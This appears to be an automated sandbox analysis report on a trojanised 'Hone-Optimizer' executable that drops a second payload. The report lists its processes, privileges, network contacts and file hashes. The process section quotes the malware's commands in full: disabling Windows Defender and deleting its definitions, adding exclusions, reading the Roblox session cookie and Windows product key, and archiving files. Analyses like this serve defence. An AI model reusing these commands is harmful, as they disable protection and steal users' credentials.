Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = [value elided] C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3172 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 3172 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 5196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2748 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5812 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 5812 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 6028 wrote to memory of 3392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6028 wrote to memory of 3392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2128 wrote to memory of 5528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2128 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 6108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 6108 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 6108 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1908 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 5856 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5856 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5856 wrote to memory of 5236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5856 wrote to memory of 5236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4108 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1676 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 3596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3520 wrote to memory of 3596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3344 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3344 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\reg.exe

reg add HKLM /F

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"

C:\Windows\system32\reg.exe

reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "Disclaimer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted]"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command omitted]

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp" "c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "Disclaimer" /f

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"

C:\Windows\system32\Dism.exe

dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart

C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe

C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe {16FFE513-AB3D-4775-805B-D0AAF557EA14}

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c date /t

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:1234567XD /n /m "  Select a corresponding number to the options above > "

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jl67d.in udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
GB 142.250.180.3:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:50111 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31722\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI31722\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/5196-26-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\base_library.zip

MD5 bbbf46529c77f766ef219f4c146e6ef5
SHA1 de07c922c7f4ba08bc1a62cf3fabddecc64f877e
